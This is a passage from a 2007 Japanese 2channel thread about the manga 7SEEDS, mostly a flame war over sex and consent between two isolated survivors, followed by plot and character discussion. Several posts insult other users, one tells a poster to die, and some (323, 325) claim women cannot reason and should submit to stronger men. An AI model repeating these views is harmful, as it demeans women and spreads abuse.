いざそうなったら、そんな綺麗な信念なんか揺らいじゃうんじゃないかと思った。

281 :269:2007/01/04(木) 07:10:28 ID:???0
あゆだって普通の人間よりは信念が強固だろうけど、もし食料がなんとかなってて
何年も死ねず、目の前に他人が一人しかいない状態が続いたら、どうなるかわからんよ
(他人を求めるほど弱くなった自分が許せなくて自殺しちゃう可能性があるな)

282 :花と名無しさん:2007/01/04(木) 08:56:19 ID:???0
>>275 秋ヲと蘭じゃないかな。
逆に2人に支配されてたはずの他の人たちの方が冷静に自分たちの状況を見ているように思えた。
「こういう時に生きる力のある人とない人の差が出る。」とか「僕たちが生きていけるのはあの2人(秋ヲと蘭)のおかげ」とかね。


283 :花と名無しさん:2007/01/04(木) 08:58:09 ID:???0
>>280
つまり女の気持ちはどうでもいいと

284 :花と名無しさん:2007/01/04(木) 09:03:31 ID:???0
アスカ「…気持ち悪い」

285 :花と名無しさん:2007/01/04(木) 09:53:48 ID:???0
女でも二人だけになったら、どんなブサイクな男でも
何年かしたら男前に見える気がする。寂しさには
勝てんよ。

286 :花と名無しさん:2007/01/04(木) 10:30:46 ID:???0
相手が卯浪でも?

287 :花と名無しさん:2007/01/04(木) 11:39:20 ID:???0
>>285

顔は慣れるかもしれないが、人柄は慣れないよ。
とくに>>280みたいに、奇麗事言いいつつ女の気持ち無視な輩は
何年かたつ前に女に殺される可能性高し。

288 :269:2007/01/04(木) 12:21:07 ID:???0
>>283 >>287
平時の思考や感覚から一歩も外をでて想像せず、奇麗事を言ってるのは
そちらだと思うんだけど。
男も女も、どうしてそんな極限状態で平時の感覚を保てると断言できる?
その自信と根拠はどこからくるの?
顔とか人柄とか気持ちとか、念仏のように言い続けてるが、そんなもんが
平時とは狂ってしまうって言ってんだよ。
結局君ら、あくまで普段の感覚でしか考えられないみたいだな。想像力ねえなあ。
いや想像出来なくてもそんなもん構わんが、的外れなレスすんなよ。

289 :花と名無しさん:2007/01/04(木) 12:29:20 ID:???O
何で作品に関係ない話で喧嘩するかね。少しまったりしようよ…

290 :花と名無しさん:2007/01/04(木) 12:29:59 ID:???0
>288
的はずれ?
「女も同じ気持ちにならない限り」レイプだろ。
「女も同じ気持ちになると想像」してるの?
それなら自分の想像では、ならない。
どんなことになっても288とは一緒にいたくないなあ。

291 :269:2007/01/04(木) 12:42:27 ID:???0
>>290
俺さあ、なんかず−っとレイプ魔みたいな扱いなんだけど、女も同じ気持ちに
ならないのに俺はやる…なんていつどこに書いた?教えてくれ。
ほんじゃ、とことん想像力の欠如した君にもう少し捕捉してあげよう。
そんな状況だと、両方とも感覚がおかしくなってしまい、どうなるか
わからない。で、その中の可能性の一つで、オレはそうなるんじゃないか、と、
推論しているに過ぎないし、「絶対に全員がそうなるに決まってる」なんて
断言も一度もしてない。
…が、「絶対にそうならない」という自信があんたにあるなら、その根拠を
教えてくれってこと(たとえば自殺するとか、さっさと発狂しちゃうとかね)
想像したと言うが、感情的になって一行だけで吐き捨てるように言われても、
まったく信頼性がないねえ。

で、俺が想像するに仮に>>290みたいな女と一緒になっても、やっぱりどうなるか
断言する自信がないなあ。
あんたみたく極限状態でもおかしくならないなんて、根拠のない自信がないから。
まあ、平時では俺もあんたみたいな頭の悪い女に近づきたかないけどね。

292 :269:2007/01/04(木) 12:43:52 ID:???0
>>289
すんまそん、もうチョイで終ると思います。いやもう終ったかな?

293 :269:2007/01/04(木) 12:52:18 ID:???0
そうそう、なんか勝手に男(俺か)の方だけが、理性を捨てて獣になって、
女はそうならない。好きな男以外絶対に抱かれない…って言いたいみたいだけど、
ひょっとしたら逆に男が引くくらい、女の方が激しく求めてくるパターンも
ある可能性だって否定はできないよ。たとえ相手が卯波みたいなのでもな。

ま、あくまで可能性のひとつだし、やっぱ男の方が暴走するケースが多いだろうと
思うけどね

294 :花と名無しさん:2007/01/04(木) 12:56:04 ID:???0
>269
>284


295 :花と名無しさん:2007/01/04(木) 12:57:44 ID:???0
極限状態でおかしくなる、という意見のが可能性の一つとして考えられるのに
なんでおかしくならない、というのを可能性の一つとしてとらえてあげられないの?


296 :269:2007/01/04(木) 12:58:37 ID:???0
>>294
そこから始まるんだよwそりゃ最初は気持ち悪い。
が、二人っきりになったあの後、アスカがどう変化したかわからんぜ。

297 :花と名無しさん:2007/01/04(木) 13:00:33 ID:???0
>>269
だいたい最初から荒れるの判りきってるでしょ
貴方の書き込みの内容じゃ?

298 :花と名無しさん:2007/01/04(木) 13:00:41 ID:???0
冬休みなんだね

299 :花と名無しさん:2007/01/04(木) 13:02:09 ID:???0
ここはセックスに燃える自信があることを暴露する掲示板ではありません。

300 :269:2007/01/04(木) 13:03:57 ID:???0
>>295
もちろんその可能性はあるし否定はしない
あとそれ以前に自殺も発狂も十分考えられる。
(俺は>>281のあゆの話で、そういう可能性を想像して揚げてみたんだが)

逆に不思議なのは、俺は「男も女も惹かれあってやりまくる!それしかない!」
なんてひとっ言も書いてないんだが、なぜかそういうことにされてる
ことなんだが。

301 :269:2007/01/04(木) 13:06:51 ID:???0
>>298
ええ、まったく同感です。気が合いますねw
実に頭の悪い奴ばかりで困る。想像力もないのがゆとり世代の特徴かな。

>>297 >>299
でも、勝手に誤読、拡大解釈してガソリンかけたのは君らだよ。

302 :298:2007/01/04(木) 13:08:15 ID:???0
>301
298はお前に行ってるんだよ。消えろ。

303 :269:2007/01/04(木) 13:09:44 ID:???0
>>302
ンなもん、ほんの嫌味に決まってるじゃないの。アホですかあんたわ。
で、まともな反論出来ないのなら、そっちこそ消えたらいかが?

304 :花と名無しさん:2007/01/04(木) 13:11:32 ID:???0
みんなで269をNGにすればいいじゃない。
自分の意見ばかり主張、からみにほぼ全レスで話のできないやつは
荒しといっしょだよ。

305 :花と名無しさん:2007/01/04(木) 13:11:43 ID:???0
>>269
一番の問題はね、デリカシーのなさ。
女性が多数を占めるスレだってこと、殆ど考慮してないでしょ?


306 :花と名無しさん:2007/01/04(木) 13:14:28 ID:???0
ああ、男性の多いスレなら
「そうそう」「俺はそうでもない」「いやこういう時だから…」
という流れになりそうだけど、ここは女性ばかりだからね。
気持ちのいい話じゃないし議論も意見もしたくないよ。

だからといってその話をいつまでも続けられても困るんだ。


307 :269:2007/01/04(木) 13:16:02 ID:???0
なんかさ、俺が加害者、悪者扱いになってるけど、俺から攻撃的なレスをしたのは
あくまでついさっきからなんだよな。
今朝の>>280のレスも、無礼なレスに対して紳士的にレスしたつもり。
結局、269や280の、誰も叩いてない一般論のレスに、いろいろ勝手な
頭の悪い解釈して、ケンカ売って来たのは君らなのに、なに被害者ヅラしてんだか。

308 :花と名無しさん:2007/01/04(木) 13:17:37 ID:???0
最初の書き込みが
そもそも間違い

309 :花と名無しさん:2007/01/04(木) 13:18:31 ID:???0
あのね、わかりやすくいってあげると
269のもとのかきこみじたいが すでにみんなのきぶんをがいしてるんだよ。

ここは2ちゃんだからいろんなかきこみがじゆうだけど、
ひとのきぶんをがいするかきこみはだめだよ。

わかった?

310 :にひゃくろくじゅうきゅう:2007/01/04(木) 13:20:18 ID:???0
>>304
どうぞどうぞ、おすすめします。↑あれ?

>>305 >>306
小中学生の女の子ならともかく、いい歳した大人の女性がこんな感情的な対応しか
できないのがおかしいと思うんですが。結局女性は理性的な議論ができないとでも?
俺はそうは思わない。
それに続けて、ガソリンぶっかけてるのは>>307に書いたけど、君らね。
ま、俺も既にガソリンかけ始めてるけど。

311 :にひゃくろくじゅうきゅう:2007/01/04(木) 13:22:37 ID:???0
>>308
今になってそんなこと言うのはあと出しジャンケンもいいとこだぜ。
まるで厨だ。

>>309
あんしんしてください
ぼくもさっきから、あなたたちのかきこで、ものすごーくきぶんわるいです。
ですから、そっちこそ、ひとのきぶんをがいするかきこみはだめだよ。
わかった?

312 :花と名無しさん:2007/01/04(木) 13:23:13 ID:???0
だから議論はしたくない、消えろって人が多いのに
なんで粘着してるんだよ。
それに大人な女性ってなんで限定してるんだ。

313 :花と名無しさん:2007/01/04(木) 13:24:13 ID:???0
すごい嵐が光臨中なのか。

314 :花と名無しさん:2007/01/04(木) 13:24:50 ID:???0
ここ全年齢板なんですけど。
で、少女漫画スレね。
理性ある大人の男性なら判ってますよね?

315 :二六九:2007/01/04(木) 13:36:02 ID:???0
>>312
そりゃこっちのセリフ。最初の話の反論や、ちゃんと想像力をこらした上での
レスができないで、ただ感情的に俺をやっつけたい、罵倒しただけなら消えれば?
俺も止めないから。
さっきからそういってるのに、叩いてくるの君らね(3人くらいかな?)。

>>313
うむ、それも複数だ。朱理の言う阿呆な連中だ。
そいつらと戦ってる俺を君も応援してくれたまえ。
(また、「おまえに言ってんだよ」なんて阿呆なレスがきませんように)

>>314
でもフラワーズはいわゆる少女マンガ誌じゃないよね?
年齢層が高くなってきた作家を集めて少コミから独立したんだったよね。
それって小学館が田村さんの読者は大人が多いって判断したからだよな。

316 :花と名無しさん:2007/01/04(木) 13:38:31 ID:???0
中高生読者は多数いますよ。
しかも今は冬休み中。

317 :にいろくきゅう:2007/01/04(木) 13:45:47 ID:???0
>>316
そうか、じゃ申し訳ないが、俺のカキコはR15指定だ。見ないことをおすすめする。
『理性ある大人の女性』と違って、確かに中学生の少女たちに聞かせる話じゃないね。
でも今時の高校生なら構わんと思わないでもないからR15

もっとも既に、さっきからお互い感情的にキーキーひっかきあってるだけで、
そっち方面では教育上悪いかもしれんが、いわゆるセクシャル方面の議論は
もう終った(理性のある大人の女性がいなかったから出来なかった)けどね。

318 :花と名無しさん:2007/01/04(木) 13:57:30 ID:???0
BOX系でさ、一番最初に遭難っぽい状況になったとき、
主人公が「映画とか見てて自分はこんな状況でも騒ぐやつじゃないと思ってた。冷静に対応できると…
でも今自分が一番騒いでる」
みたいに言ってたよね。
だから269さんが言うように日常からありえない状況になって自分が今と同じ考えできるかっていうと私も自信ない。


319 :弐六九:2007/01/04(木) 14:09:15 ID:???0
>>318
あなたは非常に理性的な女性ですw
(マジで俺の自演じゃないよ、この人は)
ああ、来るレス来るレス阿呆女づくめの中、ようやく一人現れた・・・
そうなんですよ、平時ではどんな純粋で、どんなまっすぐな信念を持っていても、
いざ想像もつかない絶望的な状況になった場合、どうなるかは分からない、ってことです。
俺や>>318さんの想像みたくなるかもしれないし、そうはならないかもしれない。
が、人間は意外と孤独な状況に弱く、変わってしまうんじゃないのか?変わらない
という根拠は果たしてあるだろうのか?

それが言いたいだけなのに、さんざん悪意をもって拡大解釈されましてね。
しまいには色魔レイプ魔のような扱いです。
ま、もうお互い様なんですけどね。後半の俺は明らかに理性でなく悪意で
攻撃してたし。
先に仕掛けたのは向こうだと大声で言いたいですが。

320 :弐六九:2007/01/04(木) 14:10:39 ID:???0
さて、どうやら終戦のようですね。疲れた…いやはやまったく実りがなかった…と思ったが、
最後にまともな人が一人だけでも出てきたので、ちょっと満足しました。
俺は女性差別をするつもりはないけど、感情でしかものが言えず、袋叩きが大好きな、
阿呆で陰険な女性は差別していいような気がしますね。むろん男もそうだけど。
ほんじゃまあ、今日はこのへんで帰ります。
でもまあ、俺はこれからも懲りずに毎日このスレをチェックしているので、
俺の話題が出たらすぐに駆けつけて、その人にレスをつけて差し上げるので
みなさん安心してくださいw

(要するに俺がいなくなってから”あの荒らしの奴がやっと消えた…”みたいな
 カゲ口を叩くような陰険なまねをしても 無駄ってこってすw)

321 :花と名無しさん:2007/01/04(木) 14:35:41 ID:???0
本屋に行ったら7種のしおりがあったよーん。
フラワーコミックスのフェアかなんからしい。
どっちが表だか裏だかわかんないけど、
ナツと安居だった(描き下ろしではない)。

322 :花と名無しさん:2007/01/04(木) 14:45:40 ID:???0
    o-o、
    ('A`)  メガネメガネ
    ノ ノ)_

323 :花と名無しさん:2007/01/04(木) 14:48:34 ID:???0
>>296は女に何を期待してるんだ?
女なんて頭でモノを考えられないで感情で動く生き物だから、
冷静に議論することなんてできないんだよ
レスしてる内にだんだん感情的になってきちゃうんだろう。
そういう場合、「はいはいそうですね。僕が悪かったです」って言っちゃえば良いんだよ
そうすれば相手は納得するんだから

324 :花と名無しさん:2007/01/04(木) 14:58:20 ID:???0
    
    (  )  メガネメガネ
    人_ )_ o-o、


325 :花と名無しさん:2007/01/04(木) 15:35:57 ID:???0
女の気持ちなんて考える必要ないだろ?
嫌なら男より強くなればいいだけ
弱いくせに強いものに逆らうなよ

326 :花と名無しさん:2007/01/04(木) 15:39:13 ID:???0
l
し  
     (  )      ・・・・・・ 
     人_ )_ o-o、


327 :花と名無しさん:2007/01/04(木) 15:40:37 ID:???0
あぼーんされないように名前変えてんのか
死ね

328 :花と名無しさん:2007/01/04(木) 16:49:20 ID:???O
一つの意見述べてるだけなんだしいいじゃん。私だって極限でどうなるかなんてわからないし。

花嫌いな人は、みんながみてて花好きもきっといるこのスレでも、平気で叩くじゃん。

それなのに、女性が多いスレだから気分害する書き込みをするな、とか言うんだね。



329 :花と名無しさん:2007/01/04(木) 16:58:10 ID:???0
こんなことを書くとまた荒れてしまうかも知れないけど、
問題提起だととらえて自分なりに考えたので書いてみる。
ちょっと、えちいことも書いてある。

寂しくて仕方なくて他に相手もやることもなくてするセクロスっていうのは
男性はあくまで出してスッキリするのが最終目的なので
「愉しみの一つ」としてアリだと思うんだけど
(もちろん男性が全てそうだって意味じゃなく)
女性には、肉体的に常に、妊娠の危険性があるから、
セクロスしてる「瞬間だけ」はさみしさも忘れられるかも知れないけど
我に帰ったときに腹ボテになって苦労するのは自分だから、
相手への好き嫌いとかじゃなくその条件下では
セクロスに自暴自棄に燃えられないと思う。
(じゃあアニャルでとかはナシよ、あくまで本番セクロスの話)

秋の蘭たちはそこを「えちいことはするけどセクロスは禁止」で縛って
バランス保っているわけで。
蘭たちは、セクロスの後に発生する問題を考えて(+子孫残したくない執念も)
良くも悪くも理性的に割り切って楽しんでたんだろうけど、
くるみ達はちゃんと理解、納得していたわけではない上に
心から好き合った(?)のでこっそり最後までやってしまったんだろうけども。

病院で産むのだってトラブって母子ともに亡くなることがあるのに、
7種世界の2人きりバージョン?という設定で出産するなんて、
まさに死ぬようなもんで。
これについては冬チームで言われていた通り安全でないと
子供なんて産めない→セクロス(したいとしても)できない。
相手が医師とかでもダメ。冬チームの虎みたいなこともあるし
妊娠中や子育て期間に俊敏に身動きできないのは危険すぎる。

ごめんなさい、続きます


330 :花と名無しさん:2007/01/04(木) 16:59:27 ID:???0
続き

加えて女性には「レイプされること」についても
もともと恐怖感があるわけで。
自分が好いていない、恐らく自分より力の強いであろう男性から
セクロスしようぜ、と言われた時点で
(仮に向こうが体だけの関係求めてるんじゃなく、すごい熱烈に告られとしても)
精神的に「私もさみしいし、気晴らしセクロス楽しもう」ではなく
「好きでない相手にレイプされるのを今だけ我慢」ってかんじに受け取っちゃうと思う。

男性側からの、問題提起のつもりだったのに
書き込みを曲解されて文句言われた、というのは
こういう、男女の考え方の違いもあると思うんですよ。

そもそも「さみしいし相手いないから残りの一人とセクロス関係になる」というのが
女性の貞操観念に引っかかってる。
ましてやセクロスは相手がいないとできないものなのに、
男性からの「俺はヤルぜ!」ととられるような発言だと
「女の意思も確認してないのに…レイープ? イクナイ!」と、
ちょっとした発言にも神経過敏になるってなもんです。
花や藤子ちゃんの言う通り、荒れた世界だと女性の立場なんてなくなっちゃうから。

それに、恋愛感情はこの問題語るときには大切で、
「ぜんぜん好きでなくても極限状態だとわからない」というのは
あくまで未来の二人の話だけど、
それがおこる前に「ものっすごい好きでその人しかダメ」って人が相手にいたら
それでまた全然変わってくる。

続きます

331 :花と名無しさん:2007/01/04(木) 17:00:33 ID:???0
続き

花も、生きる為だけに生きることは出来ないと言ってたように、
「(仮にこの世界のどこにも嵐がいなくても)他の人とセクロスするのは嫌」と
思ってるんじゃないのかな。

花の今いる世界は2人きりの極限状態じゃなくてほかにも人がいるけど、
仮に嵐以外と2人きりでも、花なら、とにかく嵐を探して探して、
男から力づくでセクロス要求されても拒める限り拒んで、
(もしくは本気で愛されて懇願されても、謝って断ると思う)
それでも何の可能性も無かったら死んでしまうような女の子だと思う。
その信念や気持ちの流れについての説明は要らないよね?
少なくとも私の持っている花のイメージは、そう。
そして、花嵐のラブメロうざ、と言われることもあるけど、
そんな花と嵐の生き方をみながら、自分ならどうだろ、と
スレ住人は重ねながら読んでいると思う。

そんな女性からの
「極限状態になっても好きな人以外とは嫌!」というレスを
ただの感情論、理想論、真の極限状態を想像できていない、とは
言い切れないんじゃないかな?
もちろん「女の子なら、そうありたい」という理想ありきで
実際にはどうなるかはわからない、というのが最終的な結論かもしれないけど
流れを見てそこは気になりました。

つまり、
「今は2人だけだが、どこかに(花と嵐のように)恋人がいるかも」なら
ぜっったいさみしくてもセクロスなんかしない!! と即言い切れる、
それが考えたなりの結論、という女性もいると思う。

続きますすみません

332 :花と名無しさん:2007/01/04(木) 17:02:59 ID:???0
続き、ラスト

マジ2人だけ、人間は全くいない、
ついでに7種世界みたいに荒れてて生きるのに必死、という条件下で
私個人の意見でいいなら
残り一人の男性を好きになれないなと思った時点で速攻で自殺するw
やっぱり二人だけだとどうしても男性側からセクロス求めてくる方向にはなるだろうし、
それが嫌な理由は前述のとおり。

でも、その条件でも、相手をマジ好きになっていたとしたら
自分は、セクロスは「向こうがしたいならさせる」と思う。
相手が好きで、どうしても自分を必要とするくらい弱ってて、
そういうことを言葉と態度でせつせつと訴えられたら、
そこまでつっぱねられるほど精神的に強くないから。
妊娠の危険があっても、だから、バカなんでしょうけど。
(バカなんていったらくるみちゃんに悪いかな?)

つまり
男女二人しかいないのがさみしくて耐えられねーと思うなら
外見はもう直すの無理だから(可能な限り清潔にしてw)
まず自分から相手にマジ惚れするとこからはじめて、
下心つきでもいいから常に優しくして、頼りになるとこを見せて、
相手からもマジ惚れさせれば、体はさみしくなくてすむかも?

というのが、個人的に考えたコトです。
いろいろ問題ある戯言だけど。

スレ内長文独占すまそ。


333 :花と名無しさん:2007/01/04(木) 17:10:54 ID:???0
>328
うーん。

花が好き、嫌いという問題と
相手のいるセクロスについての女性蔑視にもつながりかけない
(例えそれが、元レスから曲解、うがった読み方になっていたとしても)
発言とではニュアンスが違うと思うんだ。

私が思うに、元レスの男性には申し訳ないけど、
想像してもらいたいのは、「見知らぬ女性たちが」複数、
7種コミックかかえてきゃっきゃ言って読んでるところに、
同じ本読んでいて、意見交換したいからと言って、男性が
「俺男だが〜(略)〜セックスに燃えられるよ。
このことについて真剣に議論しない?」と言ってきたら
すごい微妙な空気になるんじゃないかってことで。

もちろんリアルと掲示板はちがうから、一概には言えないけど。


334 :花と名無しさん:2007/01/04(木) 17:16:47 ID:xYOHE9qzO
>>333
嫌ならスルーすりゃいいのに、炎上させたのどっちだよw最初のコメントはそんなひどいものでもないぞ。
7種は種の保存やセックスの問題も描写してんじゃん。田村さんが問題提起してんのに、意見述べたらダメなわけ?

335 :333:2007/01/04(木) 17:17:58 ID:???0
ごめんなさい、女性蔑視というのは言い過ぎ&ニュアンス違うかも。

「平時じゃ絶対お近づきになりたくないような女の子相手でも〜」
というような、ふだん男同士、友達だったら
笑って言い合えるようなレベルの言葉使いでも
それを受ける側の、このスレにたくさんいるであろう「女の子が」
どう思うか、どう曲解するのか、っていうことです。

本当に議論、意見交換したいんだったらこんな書き方はしないと思うし、
そんなことくらいででカッとくるなというような穏便な言葉使いでもない。
それからの応酬はお互い痛み分けだと思う。

336 :花と名無しさん:2007/01/04(木) 17:21:02 ID:???0
あくまでも男の都合でしか書いてない。
ならば女の側が脊髄反応しても仕方ない。

337 :花と名無しさん:2007/01/04(木) 17:22:01 ID:???0
所詮は単なる恋愛マンガなんだから
そんな真剣にならんでもいいじゃん

338 :花と名無しさん:2007/01/04(木) 17:47:57 ID:???0
やっと読めた。牛がおかしくなったようだけど、
人間由来の食料を食べたら人間もおかしくなりそうだ(共食い)。

339 :花と名無しさん:2007/01/04(木) 20:23:49 ID:???0
まさしく、前に言われた「ガンビュセスの籤」的展開に
なりつつあるわけだ

340 :花と名無しさん:2007/01/04(木) 20:59:25 ID:???0
>>321
じゃあ、ナツはまだヒロインとして考えられている、という事だ。
良かった。
そういえば某所の七種キャラ人気投票でもナツと安居で1、2位だったな。

341 :花と名無しさん:2007/01/04(木) 21:02:11 ID:???0
ガンビュセスの籤というのを知らなかったので
ぐぐったら不幸になった…

342 :花と名無しさん :2007/01/04(木) 21:02:42 ID:???0
甘いな。
人間由来の乳酸菌」入り飲料は既に発売されているのだw

343 :花と名無しさん:2007/01/04(木) 21:06:40 ID:???0
いや人間由来ったって、攪拌して作ったわけじゃないでしょ?

344 :花と名無しさん:2007/01/04(木) 21:07:16 ID:???0
人間由来の乳酸菌ってどこかの誰かの
腸の中のンコ未満から採取したんだよね…?

345 :花と名無しさん:2007/01/04(木) 21:09:14 ID:???0
>>344
それは役に立ちそう。

346 :花と名無しさん:2007/01/04(木) 21:49:46 ID:???0
燃料に使うだけで十分だと思う。

347 :花と名無しさん:2007/01/04(木) 22:46:32 ID:???0
>>329->>332
名文です。自己分析にもなりましたwありがとう。

花のイメージ、私も同じだったけどこの後に例え嵐がいなくなったとしても
今の花なら絶望はするだろうけどもう死を選ばない気がするな。

348 :花と名無しさん:2007/01/04(木) 22:52:15 ID:???0
347だけど間違えた、花が嵐以外と二人っきりという状況下での話しでしたね。
そしたらやっぱり同じイメージかな。連投スマソ。

349 :花と名無しさん:2007/01/04(木) 23:56:24 ID:???0
ま、ようするに仲良くするにはセックスが一番ってこった

350 :花と名無しさん:2007/01/05(金) 00:06:26 ID:???0
>>346
健康な人、長生きな人、いつまでも若い人、
すべてパラサイトのなせる技なのかもよ?

そういう人の菌なら、是非試したい。
だれかが試した後にw

351 :花と名無しさん:2007/01/05(金) 00:06:53 ID:???0
>>340
タムさんが主役って明言してるじゃん>ナツ
こんな大河ストーリー物をやるときには、細かい部分はともかく背骨となる大まかな
プロットは出来てるはず。それを踏まえてナツ=主役とタムさんは言ったはずだし。
作者本人のコミックスでの明言(明記)よりもよくわからんしおりの方を信じるのかね?

352 :not 340:2007/01/05(金) 00:14:52 ID:???0
>>351
うん。

作者の意のままではないことは、そこここで語られてるから。

353 :花と名無しさん:2007/01/05(金) 00:49:44 ID:???0
今更だけど、電車の中に流れたの、毒ガスじゃなく催眠ガスなんだよね。
もし落ちるときのショックで目が覚めた人がいたら最悪だな。意識がありながら
ミンチにされるって残酷すぎ。

354 :花と名無しさん:2007/01/05(金) 01:06:21 ID:???0
あの死体の成れの果てってどうやってシェルターまで運ぶんだ?
いちいち汲み取り作業やるのか?

355 :花と名無しさん:2007/01/05(金) 01:36:24 ID:???0
自動的に流れるパイプでもあるんだろう
しかし新章になってく度にどんどんグロになっていくから困ったもんだ
これ以上のグロは嫌だ

356 :花と名無しさん:2007/01/05(金) 02:41:45 ID:???0
>しかし新章になってく度にどんどんグロになっていくから困ったもんだ
一番最初の章の「小型動物が肉食と草食にわかれ、共食いをする」のですら、
「うっ」って、思ってたのに、その後、人間の体内に虫が卵産んで、人間の内部から、虫が…

書くのもいやになってきた

357 :花と名無しさん:2007/01/05(金) 08:14:36 ID:???0
確かに、一巻で虫にうげぇ〜って言ってたころが懐かしいくらいだw

358 :花と名無しさん:2007/01/05(金) 13:58:40 ID:???0
>>352
そうなんだよね。一番初めはナツ一人ヒロインだったのが、
ナツ成長までのつなぎで花をもう一人のヒロインに、
そして華やかな花に脚光があたり嵐と花の再会までだったのが
夏A登場でその先も、だからナツが今でもヒロイン扱いなのか疑問だった。
BASARAのイラスト集でも作者は結構行き当たりばったりで
描いていたような事、書いてたからね。

359 :花と名無しさん:2007/01/05(金) 14:59:01 ID:???0
ぶっちゃけナツがどういう容姿でどういう子なのかも思い出せなくなってきた

360 :花と名無しさん:2007/01/05(金) 17:43:52 ID:???0
>>358
ただ描き始めた時点で花や夏Aの登場ぐらいは予定されてただろうから、ナツのひとり主役と言うのは(読者側の
感想はともかく)ありえなかったんだろうな、とは思う。
ひとり主役だとたぶん設定満載の花の方が話を作りやすいんだろうけど、BASARAのように目的とゴールがはっきり
した話ならいいけど、先が見えないこの話では(更紗似の)花をどう動かしたらいいのか難しいかも。

でも夏Aが出てこず、花と嵐が再会したところで終了だったら、ほんとにナツの存在意義が無いような気もする。
夏Aが出てきたことによって、例えば花嵐と夏Aの対立をナツがどうにかするんじゃないかとか、ナツの活躍場所が
与えられるんじゃないかと思えるようになってきたような。

361 :花と名無しさん:2007/01/05(金) 21:05:56 ID:???0
ナツが夏Aの生い立ちを知り彼らサイドに立って
花との間の仲立ちになれればな。
本来なら冬チーム唯一人の生き残りで十五年サバイバル生活の鷹が
その役に適任なんだけど、完全に花の守護者になってるし。

362 :花と名無しさん:2007/01/05(金) 21:38:17 ID:???0
今読み終わった。
凄く面白いんだけど子孫を残すにはメンバーが少なすぎるって事が気になった。
近親相姦しまくりになるだろうね。

夏Aと花との出会いが楽しみのような怖いような・・・。

363 :花と名無しさん:2007/01/05(金) 21:42:48 ID:nBC8FXPJ0
グロすぎで暗すぎて、何でもいいから明るい展開が欲しいなー。
のび太が生き残った茂の子、だなんて救いは無理かなぁ。

364 :花と名無しさん:2007/01/05(金) 21:47:16 ID:???0
それだったらナツの方が物語的に面白くなりそう。
花の一つ下だから不可能ではないし。

365 :花と名無しさん:2007/01/05(金) 22:21:27 ID:???O
ナツ別にどうでもいいかな
単なる素人メンバーとして物語の導入に使われただけだし
女ならちさ、藤子とかもいるしね
花が百舌に絡んでるので、ちさが大臣の娘絡みで、藤子は医者絡みで物語メインに関われそうだし
あゆやこるりは夏Aの独特なポジションだから別でメインだし
そこまでナツにこだわり感じないわ

366 :花と名無しさん:2007/01/05(金) 22:40:30 ID:???O
どういうつもりで夏Bの普通より弱い子を最初の主人公にしたかはまだわ
からないでしょ。このままナツが、あくまで落ちこぼれだけどあたしなり
に頑張る!程度の活躍しかしないなら、もう影も薄いままだろうけどね。
そして花や夏Aの、所詮選ばれた特別キャラマンセーな話しか描けないん
だなって感じが強くなっちゃうけど、私は。

367 :花と名無しさん:2007/01/06(土) 00:23:07 ID:???O
私は立ち読み派なんだけどあまりのグロさに今回はギブアップ┐(´ー`)┌
コミック出るの待って家で読んでふるえるよww

368 :花と名無しさん:2007/01/06(土) 00:23:47 ID:???0
>>365
自分もナツにこだわりはないけど、いや他のメンバーにもこだわりは無いんだけど(7種の話を
おもしろくしてくれる役者としてはみんな好きよ)、ナツ好きの人って>>366氏みたいに、ナツを
活躍させられないようでは、作品もダメ、作者もダメって人が結構いるみたいね。
好きな選手がホームラン打って勝てばうれしいけど、三振ばかりだと(他の選手の活躍で)チームが
勝ってもうれしく無いってことかな。
花も夏Aのメンバーも優れてる部分もあるけど欠点もあるし、けっしてマンセーするとは思わないけどね。
ナツやその他のキャラも含めて微妙なパズルを話の中でどう生かしていくか楽しみだけど。

369 :花と名無しさん:2007/01/06(土) 01:26:13 ID:???O
>>368
ナツ好きな人はそういう人が確かにいるんだろうけど。
>>366を見てそう思うのは微妙に読み違えているな。私はどっちかというと、
ちゃんと成長して活躍して初めて好きになれるかどうかってとこだわ。
どうでもいい人には理解しにくいだろうが。

370 :花と名無しさん:2007/01/06(土) 01:42:00 ID:???0
種達の中でも、
花が最初に自分の立ち位置を知る流れになりそうなのは予想外だった。

(多分夏Aの)誰かが花の素性に気付く、
花は自分へ向けられる憎しみや悲しみ・怒りの理由を理解できない、
そんな流れで始まるのかと思い込んでいたから。

貴士が父親だと気付いても誰にも言えない、
シェルターの件も自分達7種の事も実の父親の仕業、
夏Aの運命も父親の仕業、
そんな思い心の内を抱えた最後の最後に嵐と再会…
果たして花自身がその幸せを自分に許せるものなのだろうか?

なんてパターンもあるのかも。

371 :花と名無しさん:2007/01/06(土) 02:00:22 ID:???0
>>368
もし作者がキャラの描きやすさに負けるなら
話の最終的なできに期待できないかも、という話だと思う。
それなりの重みを持って描かれたキャラには、
それなりの展開と結末がないと物語全体としても破綻しかねない。

372 :花と名無しさん:2007/01/06(土) 12:57:16 ID:???0
>>371
描きやすさ云々はよくわからないけど、今ではまだナツが、それなりの重みを持って描かれたキャラには
見えないという人は結構多いんじゃないかな?
私もナツが今の状況では、存在感がもう少し大きくならなければ、彼女に大した展開が無くても、物語は
破綻しないと思う。
今のところナツの魅力はどう動くかわからない点かなと思う。花も鷹も夏Aもなんとなく行動の行く末が
読めるんだけどナツに関してはよくわからない。今は嵐ハアハアだけど、花嵐再会後は何をするんだろ?
このまま不発弾で終わるならそれも良し、ハジけてくれるならもちろん歓迎、主役とかを意識せず今は
生暖かく見守るってスタンスが疲れないのでは?

373 :花と名無しさん:2007/01/06(土) 16:55:06 ID:???0
真面目な話、たった七人で世代重ねろってのは無理だと思うんだが。
つーか35人でも無理だろ。

374 :花と名無しさん:2007/01/06(土) 18:27:41 ID:???0
ガイドさん入れて40人だけど、冬チームが6人+ガイドさん、春チームがガイド
さん死亡、あと夏Aもガイドもどき死亡で全員生きてて31人か。
外国の生き残りとの混血でもしない限り、遺伝子は行き詰まるね、確実に。

375 :花と名無しさん:2007/01/06(土) 19:37:52 ID:???0
ホント、馬鹿政府だよな
何が7SEEDSだっての500SEEDSくらいにしろよ
もちろん一人ひとりバックボーンやってくださいね田村先生

376 :花と名無しさん:2007/01/06(土) 22:58:06 ID:???0
まあ、そこで「1人生きてりゃいい」の台詞が重要になってくると

377 :花と名無しさん:2007/01/06(土) 23:34:35 ID:???0
生存確認されたらそのうち空から宇宙人に飛んでた人類が降臨して

378 :花と名無しさん:2007/01/06(土) 23:36:59 ID:???0
いや、遺伝子が云々じゃなく、種が存続するのに必要最低限の数ってのがあって、
それは種によって違うんだけど人間の場合かなりたくさん必要。
一人生むのに一年弱かかる上に育てるのに十年二十年かかるからな。
母体への影響もでかいし。おまけにろくな医療設備も無いから死亡率も高いし。


まあ漫画だからその辺はどうでもいいんだけどな。
